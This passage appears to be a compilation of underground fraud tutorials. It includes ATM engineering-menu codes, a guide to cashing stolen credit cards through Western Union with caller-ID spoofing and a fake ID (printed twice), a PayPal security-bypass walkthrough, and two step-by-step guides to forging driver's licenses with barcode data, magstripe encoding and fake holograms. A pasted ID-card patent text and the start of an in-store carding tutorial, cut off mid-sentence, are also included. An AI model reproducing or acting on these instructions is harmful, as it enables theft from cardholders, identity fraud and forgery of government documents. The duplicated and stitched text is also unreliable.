+amount of banknotes issued by the codes and their Number.
+Exit menu #.
+0026 * - Displays the list videos.
+It looks like this:
+VLP/00/00/00 /: 01 # 1234567890
+VLP/00/00/00 /: 02 # 1234567890
+VLP/00/00/00 /: 03 # 1234567890
+and so on ....
+It's all clear / date / month / year /: serial number # opcode
+To udalti kakyu any record, select it from the list and press the reset button "C".
+To view what an entry (if the ATM supports video viewing), select it from the list and press "*".
+Exit menu #.
+0603 * - Indicates the status of safe and yacheik Number of cuts in them.
+It looks like this:
+FF: A1: 1000/100
+FF: A2: 1000/020
+FF: A3: 1000/010
+and so on ....
+If the front stated "AA" means that the cell is faulty or disabled.
+
+Empty or unused cell is denoted "RFF".
+Exit menu #.
+0099 * - Indicates the system number of the ATM, the identifier of the bank statement, date of last
+update, the protocol of the changes.
+Output from the engineering menu # # # 0 with shutting down the ATM, # # # 1 with the inclusion.
+__________________
+Ihack Post
+Getting Cash from a CC using Western Union
+You are going to need the following tools before you go to westernunion.com and transfer money.
+1. A complete Background Check of the card holder
+This is because if you are going to try and transfer anything over $100 dollars USD they will ask you
+various questions such as your previous address, Social security number, Date of birth, Mothers maiden
+name, what your middle name is, what bank issued you your credit card, etc. In order to get that kind of
+infomation you will need to go to a site like peoplefinders.com and it costs about $60 for the infomation
+you might need for western union.
+2. Phone spoofer/voice changer
+You will need this because western union will think you are a fraudster if you arent calling from the card
+holders phone number so you must use a phone spoofer service to make the caller id at western union
+come up with the card holders phone number. Basically trick western union into thinking your calling
+from the card holders house. The voice changer comes with the phone spoofer service and you need this
+obviously so your own voice isnt being recorded incase of an investication and also if your a male and
+your using a females cc to get money from wu you will want to change your voice to sound like a female.
+3. Call fowarding service
+This is something you will need because the phone spoofing service blocks 1800 numbers or any toll free
+phone number. You can only dial 10 digit numbers with phone spoofers so you have to get a call
+fowarding service so when you call the 10 digit number from the call forwarding service it will foward to
+western union.
+4. Internet phone service
+If you are located in europe this is a must because it will cost you too much to use the spoofer and call
+fowarding service and it is also not traceable. I personally use my pre-paid cell phone but i'm located in
+the USA.
+After you have got that stuff all set up the first thing you need to do is make sure the call fowarding works
+and the spoofer works and comes up with whatever number you put in for the caller id. When you finally
+have that all set up and you have your background check all set up then you go to westernunion.com and
+make the transfer. After you make the transfer it will most likely say something to the affect "Transfer on
+hold, Please call Western Union to confirm" or something to that effect and you call them up with the
+
+caller id/spoofer and call fowarding service. n00b's to this may have some problems and might not be able
+to pull this off the first 10-15 times but you will get the hang of it like I did. I have done about 13
+transfers and only had maybe 6 actually go though for pickup. Another thing you should get is a fake id
+because that will be the only way to link back to the fraudster in an investication. If you have a fake id
+and use it to pickup money you will most likely not get caught or it will be very hard to track you down.
+Remember that you may not be successful your first few times but keep trying and when you do get a
+successful transfer you will be really happy. Some things I would like to point out is that first check and
+make sure the card your going to use is valid, I personally use yahoo wallet to verify the cc before I even
+think of using it. Also, to get spoofing service for caller id/voice changer I use spoofcard.com and for the
+call fowarding service I use is accessline.com
+You are going to need the following tools before you go to westernunion.com and transfer
+money.
+1. A complete Background Check of the card holder
+This is because if you are going to try and transfer anything over $100 dollars USD they will
+ask you various questions such as your previous address, Social security number, Date of
+birth, Mothers maiden name, what your middle name is, what bank issued you your credit
+card, etc. In order to get that kind of infomation you will need to go to a site like
+peoplefinders.com and it costs about $60 for the infomation you might need for western
+union.
+2. Phone spoofer/voice changer
+You will need this because western union will think you are a fraudster if you arent calling
+from the card holders phone number so you must use a phone spoofer service to make the
+caller id at western union come up with the card holders phone number. Basically trick
+western union into thinking your calling from the card holders house. The voice changer
+comes with the phone spoofer service and you need this obviously so your own voice isnt
+being recorded incase of an investication and also if your a male and your using a females cc
+to get money from wu you will want to change your voice to sound like a female.
+3. Call fowarding service
+This is something you will need because the phone spoofing service blocks 1800 numbers or
+any toll free phone number. You can only dial 10 digit numbers with phone spoofers so you
+have to get a call fowarding service so when you call the 10 digit number from the call
+forwarding service it will foward to western union.
+4. Internet phone service
+If you are located in europe this is a must because it will cost you too much to use the spoofer
+and call fowarding service and it is also not traceable. I personally use my pre-paid cell phone
+but i'm located in the USA.
+After you have got that stuff all set up the first thing you need to do is make sure the call
+fowarding works and the spoofer works and comes up with whatever number you put in for
+the caller id. When you finally have that all set up and you have your background check all set
+up then you go to westernunion.com and make the transfer. After you make the transfer it will
+most likely say something to the affect "Transfer on hold, Please call Western Union to
+confirm" or something to that effect and you call them up with the caller id/spoofer and call
+fowarding service. n00b's to this may have some problems and might not be able to pull this
+off the first 10-15 times but you will get the hang of it like I did. I have done about 13
+transfers and only had maybe 6 actually go though for pickup. Another thing you should get is
+
+a fake id because that will be the only way to link back to the fraudster in an investication. If
+you have a fake id and use it to pickup money you will most likely not get caught or it will be
+very hard to track you down.
+Remember that you may not be successful your first few times but keep trying and when you
+do get a successful transfer you will be really happy. Some things I would like to point out is
+that first check and make sure the card your going to use is valid, I personally use yahoo
+wallet to verify the cc before I even think of using it. Also, to get spoofing service for caller
+id/voice changer I use spoofcard.com and for the call fowarding service I use is
+accessline.com
+Holographic Overlaminate
+The present invention includes a process that prints a clear layer or layers over a YMCK composite
+printer layer on an identification card by using the overlayers as a printable surface. These overlayer
+panels (OP) are known in dye sublimation printing. They are typically used to protect the dyes that have
+been sublimated into a substrate from UV degradation. Because the OP has an UV blocking component
+which causes the OP layer to fluoresce in UV light, when a pattern printed in the OP layer is bathed in
+UV light, the entire printed pattern (whether a logo, writing or other computer generated design) will
+fluoresce. Different OP layers have different formations for UV protection. Ribbons with OP layers are
+available from Dai Nippon of Tokyo, Japan have characteristics ranging from brightly fluorescent to
+absorbent. Combining more than one OP layer would give the fluorescing printing changes in intensity
+and hue.
+If the OP layer or layers are used for printing images rather than laid down on the identification card as a
+full sheet, the sublimated dye not covered by the image would be unprotected against UV degradation.
+Since the OP layers themselves are very thin, even with the OP layer being laid down on the card as a full
+sheet, the durability of the image is problematic. Additional overlaminate material can be laminated onto
+the card, increasing the durability and longevity of the card. This second overlaminate material can be the
+holographic material or clear material such as PolyGuard (sold by FARGO Electronics, Inc. of Eden
+Prairie, Minn.).
+If the OP layer is printed over the dye or resin, it does not sublimate into the card but sits on top of the
+card. When the second overlaminate material is laminated on top of the image printed on the OP layer, a
+series of ridges with refracting angles are created by the printed image of the OP layer underneath the
+second overlaminate. By modulating the printed pattern at a high frequency, this process can create
+something similar to a diffractive grating where sharp angles are embossed into the reflective surface to
+create more refractive angles to refract light. In one form, the process causes the printed edges to refract
+the light so that angling the card from a light source will bring the outline of the clear printed image into
+view when the angle of the refracted light aligns with the viewer.
+When more printed OP layers are used, then one OP layer can be used to protect the YMCK dye printing
+and the additional OP layer can be used for security imaging. By putting more OP layers on the card,
+especially when the OP layers have different refractive properties or different UV absorbing or
+fluorescing properties, additional security features can be devised.
+The overlaminate, which is laminated onto the identification card in a second step, can be scored by the
+laminating print head of the identification card printer. This scoring would take the form of reflectively
+compatible angle grooves. Each groove further enhances the OP layer's refractive properties, creating a
+diffraction grating like image to appear as the card is moved away from a horizontal plane and light
+
+reflects accordingly.
+The diffraction grating type image which previously had to be embossed into the overlaminates now can
+be simulated by printing the OP layers and using the second overlaminate which will reduce costs, time to
+manufacture, and enable accurate targeting of the image. In addition, if the printed overlaminate is
+modulated by either printing or special overlaminate manufacturing, more reflective edges are created to
+enhance the security image.
+Identification card ribbons (FIG. 1) consist of a series of panels (in the case of FIG. 1, consisting of
+yellow dye (1), cyan dye (2), magenta dye (3), black resin or black dye (4), and a clear overlaminate (5)
+thus being known as a "YMCKO" ribbon, each of which are coated with dye sublimation ink or resin ink.
+Each ribbon can be configured with different ink panels depending on the specifications desired. Thus,
+the ribbon in FIG. 1 could eliminate the black resin panel, thus becoming a "YMCO" ribbon, or the
+overlaminate could be eliminated, thus becoming a "YMCK" ribbon. All combinations of ribbons that are
+able to print in full color require the yellow, cyan, and magenta panels. The ribbons are rolled onto
+circular cores (6) which fit into the printer. The ribbon is situated between the print head and the blank
+identification card. The printer then receives instructions from a computer that is connected to printer as
+to the digital images and heating instructions to heat the print head to place such images onto the
+identification card (7) (FIG. 2).
+FIG. 3 shows the carrier ribbon ( and the overlaminate material (9). The overlaminate material is designed
+so that it would completely cover an identification card when heat from the print head is applied to the
+entire overlaminate material. The overlaminate has a laminating material coated on the exposed side
+(which is face down when run through the printing process) of the laminate. When heat is applied, this
+coating material bonds the lamination material and the identification card together.
+FIG. 5 shows the process of laminating. The ribbon core (6) has been mounted onto the core holder (12)
+and the ribbon (13) has been pulled through the print head mounting assembly (14) and is pinched
+between the print head (15) and the identification card (7), which is held tightly by a pinch roller (16).
+The used ribbon is re-wrapped around a take up roll (not shown). The identification card is fed into the
+printer by a series of pinch rollers (17) from an input hopper (not shown). The identification card (7)
+moves with the ribbon panel, and then is pulled in the reverse direction from which it was fed to have the
+next panel printed upon it. Thus the card moves forward and backwards depending upon its location and
+the ribbon panel location. The pinch rollers are capable of moving bi-directionally while the print head
+and print head mechanism remain stationary. Once printed and laminated, the identification card is moved
+from the print head area by a series of pinch rollers (18).
+In FIGS. 4A through 4D, the results of the bonding can be seen. The identification card (7) has been
+printed on, and the overlaminate layer (9) has been applied over the full length and width of the
+identification card. FIG. 4B is a cross-section of the bonded identification card (7). The overlaminate (9)
+cove's the entire width of the identification card. If the cross-section was lengthwise rather than through
+the width of the card, the overlaminate would stretch the entire length of the card. The clear feature of the
+overlaminate allows the printing on the card to be completely visible. The dye sublimation (10) have
+sublimated into the card, remaining below the surface of the identification card (11) so that the surface is
+still flat until the overlayer is applied. When and where the overlayer is applied, the card's thickness is
+increased. Resin ink sits on top of the surface and also provides ridges.
+The overlayer can be supplemented with an additional lamination at a separate station. Identification card
+printers such as the Cheetah II or the Pro-L (available from Fargo Electronics, Inc. of Eden Prairie,
+Minn.) incorporate a second lamination station for an overlaminate that is thicker and more durable than
+the overlaminate layer applied at the printing station. This thicker and more durable overlaminate such as
+PolyGuard sold by FARGO is on a separate roll from the YMCKO ribbon. These overlaminates are
+suitable for having a holographic type image embossed therein. In FIG. 4C, the results of applying the
+thicker overlaminate can be seen. The identification card (7) has the sublimated dyes or resins (10) which
+have become part of the card. The overlaminate layer (9) has been laid down in a full sheet to cover the
+entire card, and the thicker overlaminate layer (19) has been laminated on top of the first overlaminate to
+
+create a sandwich effect.
+In FIG. 6, the overlayer panel (9) is printed on (20), rather than being laid down as a full sheet. The
+printed image can be any graphic image created on a computer FIG. 4D shows the cross-section of the
+card (7) with the overlayer (20) being printed as a clear printed layer rather than as an unbroken sheet.
+When the thicker overlayer (19) is applied in FIG. 4E, the effect is to create ridges on the thicker
+overlaminate sheet rather than a smooth surface as was shown in FIG. 4C. When these ridges are created,
+light reflects from the edges of the underlying overlaminate (20) creating a ghosting image when the card
+is moved from a horizontal plane.
+In some cases, application of the overlaminate is not a viable option because of the cost of the
+overlaminate and the price of the printer required to laminate the card. In that case, a similar methodology
+can be utilized that achieves a similar result. In FIG. 6, the overlay materials is laid down as a first pass,
+with the heavier overlaminate materials being applied in the second operation, utilizing a hot roller. To
+achieve a similar result, the first thin overlaminate is applied in reverse, i.e., the entire overlaminate panel
+is applied except for the image. Instead of a raised surface on the card, the image is actually lower than
+the overlay material on the card. The ridges that are created are inverted, sot hat the eye can still see the
+image, since the image is the area where the overlay was not printed. Since there is no overlaminate
+coating in this embodiment, the image can be seen, otherwise the application of the second, heavier
+overlaminate would cover and fill in the nonprinted area. Since the non printed area has no protection
+from UV rays, over time the image (as this is the non printed area) will appear since the dye sublimation
+inks will fade from exposure to UV light.
+Although the present invention has been described with reference to preferred embodiments, workers
+skilled in the art will recognize that changes may be made in form and detail without departing from the
+spirit and scope of the invention. For example, other types of overlaminate, over lamination techniques, or
+techniques for creating ridges in an overlaminate layer can be sued when implementing the present
+invention. For simplicity, a preferred species is disclosed. However, the invention includes the gnus and
+the invention should not be limited to any particular species when interpreting broad steps or elements of
+the invention.
+How to Bypass Paypal Security Measures
+This gets asked alot, I do believe this still works and hope this helps you in anyway, if this tut is
+crap/useless/dont work, ill close it
+Step One:
+Go to your browser open http://Www.Paypal.com
+Step Two: Type in the login information for your paypal account you will be using for teh bypass.
+Step Three: Kay when your logged in and you get that shitty paypal security message all you do is click
+""help" or "security center." They both work usually, sometimes one doesn't work and one does. If one
+dont work log out and try agian
+
+Step Four: Do not click "My account" or anything else. Only navigate to "send money" or "request
+money."
+Step Five
+You're now in the account. Do not send money to your personal account. It will work, but it will cause
+both paypals to be limited.(Like I said before this account was for show purposes only and was intended
+to be limited.)
+Hope it works ^^.
+How To Make A Perfect Teslin ID
+How To Make A Perfect Teslin ID, Tutorial #1 :
+Chapter 1 - Items/Supplies Needed
+Chapter 2 v Templates/Editing
+Chapter 3 - Printing
+Chapter 4 - Laminating
+Chapter 5 - Finishing Touches
+Chapter 1 - Items/Supplies Needed
+Many supplies are needed in order to create a valid real looking license. Let's first begin with the basic
+supplies needed. You will first you need to get an exacto knife, I prefer the ones with the rubber handles,
+makes it easier on the hand when you are cutting the teslin. Scissors, a nice clean, sharp pair works
+perfectly fine. The kind that your teacher never let you use in elementary school is the best one to use.
+Sandpaper, will also be needed, 1000 and 1500 grit is suggested. A cutting board, this comes in handy
+when you don't want to leave slice marks in on a desktop
+(http://www.brainstormidsupply.com). Laminator, this one I will go into detail about. Choosing the right
+laminator is very important, personally I prefer the GBC 40, which can be purchased at Office Max, for
+$49.99. It's cheap but it does get the job done right, and surprisingly it keeps the id held together through
+3 times washed. The preferred laminator by many id makers is anyone with a temperature control, the
+better control you have over the heat, the better the lamination is going to be. A carrier, which is a guide
+for the id to sit in so your rolls on the laminator don-t get messed up. A few index cards, just the size that
+will fit through the laminator.
+Now we move onto one of the biggest parts, PRINTERS. Printing with a HP 620C, will definitely not do
+the job and your id will look like a 5 year old made it. Preferably use an Epson C80, or any Epson line. If
+you don't have an Epson or can't get your hands on one, any HP 900 Series will do the job right. Teslin,
+the oilpaper in which you will be printing the templates onto, can be ordered online.
+
+http://www.brainstormidsupply.com - Recommended place to buy teslin. If you have an inkjet printer,
+order inkjet teslin, and so on with laser. Believe it or not there is a difference between the two.
+Hologram's, you can either order these or make them yourself. In tutorial #2, I will go into detail on how
+to make precise holograms, but in this one, I suggest just ordering from a trusted site, Digital Rebellion
+usually has reviews and so does #fakeid and #identification on Dalnet. Camera, a digital camera one with
+at least 2.1 mega pixels, is recommended, any less and the quality decreases. Kodak makes nice cameras
+to use in this instance; I personally own one and my pictures have come out perfect.
+Chapter 2 v Templates/Editing
+Templates, are one of the biggest parts of the id making process, shitty templates equal shitty ids. Usually
+people on Digital are willing to trade or pass a quality template on to you. Making your own template is
+another possibility, but it takes much skill, time and patience. Something not a lot of people obtain, so if
+you-re a beginner, stick with the pre-made templates. A good template ranges from any from sizes of 50 v
+90 megabytes. Now, mostly all templates come in a .PSD file, for those of you who are new, it-s an
+Adobe Photoshop image. Designers do this because they can fit many layers into one file, and the layers
+are editable, making it easy to re-enter information. Some knowledge of the program is needed but not
+necessary, you can read their free tutorials. Photoshop itself costs in excess of $500, but it is possible to
+find someone with a spare copy.
+Well, now that you got your template that you want to use, we are ready to begin. First, the photo that you
+will be taking needs to be at least a foot to two feet away from the person. Lighting doesn’t really matter;
+just make sure it is enough to see. Take the picture on a white clear wall, this allows for easier editing of
+the photo. Once, the photo has been taken, we now move onto to the editing phase of the photo. You will
+need to replace the background on the picture with one of a light blue, my suggestion, is copy the blue
+from the picture blue on your template. This is where the skill comes in, you have to make the photo look
+believable, or otherwise, it-s going to be crap. Make sure you get rid of all white effects all around the
+hair, neck, and shoulders. After replacing the background is complete, you will then need to add some
+form of lighting effect to the picture to help intensify, and make it look more believable. My choice in
+lighting in Photoshop, is Filter>Render>Lighting Effects. Adjust the circle around the picture, so there is
+more light exposure. Switch light type to Omni Light, Intensity and Exposure levels need to be adjusted.
+You decide on the levels you want to use, I personally like to use Intensity v 18, Exposure v 13. But once
+again this is an option that varies from picture to picture. How the picture is taken, what kind of camera,
+you get the general idea.
+Next we move to the cutting stage, you will need to cut the picture from about a half an inch above the
+head to right below the shoulders. Basically take a look at your real license and try and follow how that
+looks. Upon cutting it you will need to resize and possibly upsize or downsize to fit the borders in which
+the picture is suppose to go. This can take some time to get it perfect, but the better it looks the better it
+will work. After completing the first picture on the left, we will move to the second picture on the right.
+Downsize this one a lot to fit the borders, after resizing the second picture, you will need to make the
+opacity 40%. This will make the picture look faded to an extent that is needed.
+Editing the license should be fairly easy. Basically all you will have to do is change the information
+around to fit the needs of the person in whom your making it for. The license number really doesn’t
+matter, not like in Michigan or some others states where the first letter is the letter of your last name. I use
+B to start the license number. Another suggestion that is very helpful and usually works for me is to go to
+www.whitepages.com and search for someone with the last name that you-re making the id for. This will
+give you a street address, city, and zip. It-s very helpful, when you do not know many cities in which you
+are making the id for. On the bottom of the id are a bunch of numbers and letters and, those are just to tell
+where the picture was taken and the id was made. Now, there are two ways to do the signature on the id,
+one is to have a person sign a piece of paper, then scan it, size it down and import it into the template
+(recommended way). The second way is to download a signature font, and then just type it in. In my
+opinion it looks fake.
+
+First, we must edit the back of the template of the id. Try and download a CA Barcode program, it allows
+you to enter the expiration date and the drivers license number of the person and it will make you the bar
+code for the back. Copy the picture to the clipboard; now import it onto the id. If you don-t have this
+program or can-t find it don-t worry.
+Chapter 3 v Printing
+Printing is one of the most complicated parts of making the id in my opinion. Everything must be
+perfectly aligned right and set up in order to create a believable looking id. You will first need to print out
+a black and white copy of the id on a piece of white paper. After printing out the black and white copy,
+you will then need to cut a strip of teslin to fit over the area in which you printed on. After cutting the
+piece of teslin, tape the corners of the teslin down. Put the paper back in the printer and then before
+printing set the DPI to the highest setting and the best quality printing. It is also recommended that you
+change the paper setting to photo quality. The paper will come out, I suggest putting it in front of a fan to
+let it dry quicker. Leave it there for about a minute or so. After, drying off comes a very difficult part
+lining up the teslin with the print previous to it. You must be sure to exactly line up the teslin with then
+picture on the paper. My suggestion is to put the paper and the teslin in front of a light and have someone
+tape the corners down for you. After taping the corners put the paper back into the printer, we will now be
+moving on to the back of the id. Now, print to the back of the teslin, you should be printing at the same
+resolutions as was before. Pull it out of the printer and put it in front of the fan for another minute. And
+now we-re ready to move to the next stage of the process.
+Chapter 4 v Laminating
+Laminating is one of the biggest parts too of the id process, it includes much time and patience trying to
+make sure everything is aligned properly. Otherwise, you just wasted a piece of teslin and a perfectly
+good hologram. Now, take your hologram and separate the top and the bottom. Take a rag and just get it a
+little wet, and wipe down both the top and bottom parts of the hologram. After that set it in front of the
+fan and let it dry off. After it gets dry, set the top half of the hologram on the front side of the teslin. Now
+make sure it is aligned evenly and that that it-s equal distance all around the id. Now, tape three sides, the
+top, bottom, and the left side. Turn on the laminator; once the ready light comes on we-re ready to begin.
+After taping is complete, put the id in the carrier, then put the side that is not taped in the laminator
+slightly, just enough so that it doesn’t go through but laminates the one side. Now, pull it out, remove the
+tape, and run the id back through the laminator. This ensures that the id will not move from the current
+position that it is in. Making your id almost perfectly done. After the front, it laminated, put it again in
+front of a fan and let it cool down. Once, it is done, take it and put in on a hard surface or your cutting
+board and take out the exacto knife and start cutting the teslin away. Making sure not to leave any borders
+on the id. This will ensure less work later on in the process. Now, take the back part of the id, and align it
+evenly, and tape three corners once again. Put, the one side that isn’t tape slightly into the laminator, once
+complete, take it out. Remove all the tape and run the id back through the laminator. Now, your id is fully
+laminated and we-re ready to move to the last stage.
+Chapter 5 v Finishing Touches
+Your probably thinking, finally, we-re here, but the work isn’t all over yet. Take out the sandpaper 1000
+or 1500 grit. Now, corner off the corners better, making sure that they are smooth and there is no hard
+spots. Give the edges a nice sand to making sure that when you rub your finger on the corners and edges
+it feels good. After completing this, take out the 1000 or 1500 grit sandpaper, and in a circular motion
+sand the front of the id. We are doing this to try to get rid of some of the gloss on the id. The less glossy
+the better it will turn out. Another way is to sand a little bit on the front with 1000 or 1500 grit, then take
+the id, go outside and run the shit in the dirt for a little bit, same for the back, Then take two dirty ass
+cards and put your id between them in your wallet. Leave it there for a day or two. Now, after sanding,
+check the corners and make sure there are no breaks in the laminate. Try to do a bend test on it, which is
+
+taking it length wise, and bending it slightly, if anything pops, run it back through the laminator. If not,
+you did a good job. But still give it a run through the laminator with lots of pressure. Put a few index
+cards above and below the carrier, and give it one finally run through. And now, your ID is complete.
+Congratulations!
+How to make great fake ID
+1. Obtain necessary supplies from one of the following websites:
+http://www.arcadiaid.com
+http://www.poisonid.com
+http://www.idsupplystore.com
+2. Find and edit the templates
+Search a Peer-2-Peer network such as Kazaa, LimeWire or BitTorrent to find a template. By using Adobe
+Photoshop or Macromedia Fireworks, or a free program like GIMP, you should easily be able to edit the
+templates.
+3. You should begin editing by changing the text fields. Most standard IDs use the font Arial that comes
+with Windows but if you wish to use specialty fonts that do not come with Windows (such as a font for
+signatures) you can see how to download and install them by reading this article: Install Fonts On Your
+PC.
+Edit the eye and hair color fields as follows:
+Eye Color- Indicate eye color abbreviation:
+BLK - Black
+GRY - Gray
+MAR - Maroon
+BLU - Blue
+GRN – Green
+PNK - Pink
+BRO – Brown
+HAZ - Hazel
+MUL – Multicolor
+Hair Color- Indicate hair color abbreviation:
+BAL – Bald
+BRO – Brown
+SDY - Sandy
+BLK - Black
+GRY - Gray
+WHI - White
+BLN – Blonde
+RED – Red
+Also, if your ID has restrictions or endorsements here are the codes. Some are rarely used but others, like
+restriction code B are quite common. Here are a list of some of the more popular codes:
+Restriction codes:
+A - No Restriction
+B - Corrective Lens
+C - Mechanical Aids
+D - Business Only
+
+G - Daylight Only
+H - Employer's Vehicle Only
+J - Prosthetic Aid
+Q - No Passengers
+R - motorcycles 500 cc & under
+S - to & From School
+T - To & From Medical
+U - all motorcycles except Class X
+2 - Personal Vehicles Only
+Endorsement codes are less common but include:
+M - Motorcycle endorsement for any motorcycle regardless of engine displacement.
+P - Passenger vehicles designed to carry 16 or more persons, including the driver.
+T - Double/triple trailers allowed.
+Y - Farm endorsement (Class A).
+4. Then, scan in the photo and signature image files
+You need to scan in a passport photo or other acceptable ID picture. Also scan in a signature. If the
+background of the passport photo does not match the background of the state id, you will need to do some
+editing.
+5. After scanning the passport photo into the computer, the person's face will need to be separated from
+the background so it flows seamlessly with your ID card template. Using a program such as Adobe
+Photoshop, Macromedia Fireworks, or GIMP, provides you with an image editing tool called "Magic
+Wand". This tool will allow you to click a color in the image and it will select all surrounding colors that
+are similar or the same. There will be a slider that will allow you to select the amount of variance from
+the color you select. The higher the variance relates to more of the image that will be selected. Once the
+background is nearly fully selected without containing any of the person's face, press 'Delete' on your
+keyboard to erase it. You can then magnify the image and use the eraser tool to clean up around the
+person's face. At this point, zoom out and copy the image. It can be pasted onto your ID card template. It
+will then flow seamlessly into your template design and you can choose any background color you want!
+For more detailed instructions on how to edit facial images for use on id cards, see this article: Edit Face
+Images for Use on a Fake ID.
+6. Then, add a Barcode
+The unusual-looking scrambled barcode on the back of most driver’s licenses is known as a PDF417
+barcode. This barcode contains most of the information contained on the front of the license. By editing
+this readout, you can encode your information into this barcode. You can generate these barcodes by
+finding a free PDF417 Generator online. Below is the general sequence.
+ANSI 6360263f02DL20393504EM02460010DLDAQ1414556
+DAASMITH,JOHN,A
+DABSMITH
+DACJOHN
+DADA
+DAG423WILSON
+DAIMIAMI
+DAJFL
+DAK044
+DBB190922
+DBA2480922
+DAU511
+DAW170
+DAZBR
+DAYBLU
+DBC2
+DBHN
+DARC
+DBD200684003
+
+DASB
+DBE1
+DBIN
+EMEMEWPFD
+7. Add a Magnetic Stripe
+If your license requires a magnetic stripe and you want it to be scannable, it can be encoded with an
+encoder. Generally these are very expensive and are difficult to find. However, you can get the EasyIDea
+Magnetic Stripe Encoder for less than $400 bucks. There are two types of magnetic stripes, HiCo and
+LoCo. HiCo and LoCo magnetic differ in that HiCo are much more difficult to demagnetize. The
+encoders for these typically were much more expensive than for LoCo. Most HiCo encoders encode
+LoCo stripes as well. The best way to program the stripe is to decode a working driver’s license, edit the
+data, and then program it back onto the stripe. Encode the magnetic stripe after the card is finished.
+8. After editing is done, you can start printing
+You will need to print on a synthetic paper. There are two types of synthetic paper that are nearly the
+same. Teslin and Artisyn paper are single layer, silica-filled, polyolefin printing substrate with unique
+microporous and temperature resistance features that make it the product of choice for laminated ID
+badges. Teslin is more expensive than Artisyn and much less versatile. If you want to use a desktop inkjet
+printer, you will achieve better results with Artisyn or Artisyn NanoExtreme™ synthetic paper. Printing
+on Teslin with an inkjet does not work well and tends to look grainy and smear. The Artisyn and Artisyn
+NanoExtreme™ are coated with chemicals to absorb the ink effectively. It is cheaper than Teslin, works
+well with all types of printers including inkjet and laser printers. It also tends to produce better print
+quality results. Teslin can be found at PoisonID.com and Artisyn can be found at ArcadiaID.com. Arcadia
+also sells perforated sheets that punch out in the size of the ID cards.
+9. The next step is to select your printer. The preferred method is to use a pigmented based inkjet printer
+like an Epson printer with DuraBrite ink. This tends to produce incredible results and works well with
+Teslin even though it is not a laser printer. Better results are still achieved on Artisyn paper, and for the
+highest quality results Artisyn NanoExtreme™ should be used. If a pigmented ink printer is not available,
+a laser printer is still a good result. Laser printers produce sharp and clear results, but the ink tends to look
+waxy. Lastly, any dye-based inkjet printer will work fine. A dye-based inkjet printer is that standard color
+printer that most people have in their home. Again, if you use dye-based inks make sure to use Artisyn.
+You should print on highest quality photo settings.
+Print on one sheet of paper, both front and back.
+10. Then, the next step is cutting.
+If you are using EasyIDea Microperforated Artisyn, you can skip this tedious step. Otherwise, start by
+cutting out the ID from the paper. Tracing the dimensions of the ID using a butterfly pouch is generally
+helpful. A paper cutter or X-Acto knife is also helpful. After cutting sheets by hand for a while, I decided
+I’d rather use the punch-outs from http://www.arcadiaid.com
+11. Then you will need to laminate.
+You must use thermal laminating in order to bond the butterfly pouch to the synthetic paper. Once
+laminated, the card will harden and resemble a PVC card. You must use a thermal (heat) pouch laminator.
+Avery, Arcadia EasyIDea, or GBC makes good ones that run around $50. If you can't afford a laminator
+then you can use a standard home iron. This is a little more tricky as you have to make sure the iron
+doesn't get so hot that it melts the laminate plastic but is still hot enough to bond the laminate to your ID.
+Also be sure the iron does not have any water loaded into it as this could damage the ink on the pre-
+laminated ID and the steam could warp the ID card.
+12. Next, place the insert into the butterfly pouch. You must place the card into a carrier. Run the carrier
+through the laminator. Immediately following lamination, it is helpful to place the card under something
+flat like a book so that it cools flat.
+13. Then, apply a hologram.
+Generally, it is acceptable to use a generic hologram. Very few people actually examine the hologram and
+read what it says on it. I have had my fake for over two years with a generic hologram on it and I have
+never had a problem. If you’re concerned about making something that looks truly authentic, there are
+other methods to replicate holograms. The Shield and Key hologram is the most commonly used generic
+hologram and is a transparent rainbow hologram. This means that it looks transparent when looked at
+directly but when tilted to the sides the hologram lets off a rainbow spectrum. This is my generic
+
+hologram of choice when making fakes. This type of hologram is pretty much impossible to duplicate
+using the Pearl-Ex method below.
+14. Making a Hologram
+The gold holograms on many ID cards are called binary holograms. These holograms can be easily
+reproduced using Pearl-Ex paint and Photo-EZ paper.
+This product is for making stencils. A stencil is basically the outline of a picture with the negative part
+missing. To make the stencil you scan the hologram off your id, then convert it to an all black image.
+Next you print the image on a transparency. A transparency is a transparent sheet of plastic meant for
+inkjet printers or lasers. Then you take the transparency and tape it to the Photo-EZ. You put it out in the
+sun and all the areas of the material not covered by the black negative of the holo cures. When washed the
+part covered by the negative washes away, leaving you with your stencil. You will want to order the high
+resolution material. This product can be ordered from cBridgeand more information can be found there.
+As for the painting material, the two main ones are Interference Gold (Fine) made by Golden Acrylics
+and PERL-EX DUOTONE. The latter of the materials work best because of the fact it reflects two colors
+of the spectrum. Perl-Ex comes as a powder and preparation is needed. These paints are transparent when
+viewed from straight on. When viewed from different angles you see different colors depending on the
+particular colors of the paint. Perl-Ex comes in Duo Red-Blue, Duo Blue-Green, and Duo Green-Yellow.
+Perl-Ex is available in a lot of places here is one: http://www.sierra-enterprises.com/pearlex.htm
+You have to buy a Transparent Base made for paints to prepare the Perl-Ex. A good one is Speedball
+Transparent Base. You mix in a 1:50 ratio. 1 part Per- 50 parts base. If you are using Golden acrylics then
+you use a 5:1 ratio. 5 parts paint 1 part base. When applying the paint in the stencil, you should use if
+possible one of those brushes made for screen printing. It is like a pencil but with a flexible tip. A sponge
+can be used but extra care needs to be taken when applying. You want to apply a very thin amount and
+practice will be needed to get it right.
+On a lot of the new ID's there is a multicolored hologram that reflects the full spectrum (like a rainbow).
+This is especially true of most of the Canadian ids. What you do is pick the two most dominant colors and
+buy the matching Perl Ex colors. This will be good enough to reproduce the holo. The holo can be put
+directly on the finished ID or before lamination on the inside of the pouch. If you choice is the inside then
+remember to put it in the reverse.
+15. Then, you’re ready for the finishing touches.
+It is recommended that you sand the edges of the hologram with a very fine grit sandpaper. This removes
+the jagged edges of the synthetic paper. You should lightly sand the front and back of the id to give it a
+more worn look.
+16. Lastly, these instructions were to make a 30 mil drivers license that resembles a PVC card. If you
+want to make something thinner that bends corner to corner like some ID cards, you can remove the front
+part of the butterfly pouch and simply laminate the back of the pouch with the synthetic paper. Many
+machines use this method, but it can be accomplished manually. You can also replicate signature strips by
+scratching the surface of the butterfly pouch with sandpaper.
+17. Have fun and don’t be an idiot with your ID.
+Inshop Carding TUT
+I figured it was about time all you noobs and not so new noobs got some fresh advice to help you out
+there in the world of instore carding. I mean half these tut's use names I haven't seen since SC and
+CP.So,here goes. All the obvious shit has been beat to death and if your too lazy to read it again. Here it is
+
+Don't shit where you sleep--NEVER card anywhere near your hometown!
+Dress the part-Look like you should be buying what your carding,,if your trying to card expensive jewelry
+and your pants are sagging down around your ass the only thing your leaving that store with is a matching
+set of silver braclets and a free ride to county. Like it or not your an actor now and think of your clothes
+as props and dress according to where you are working.
+Only use nice shiny new cards if you want the cashier to look at your ID very carefully,,a new card could
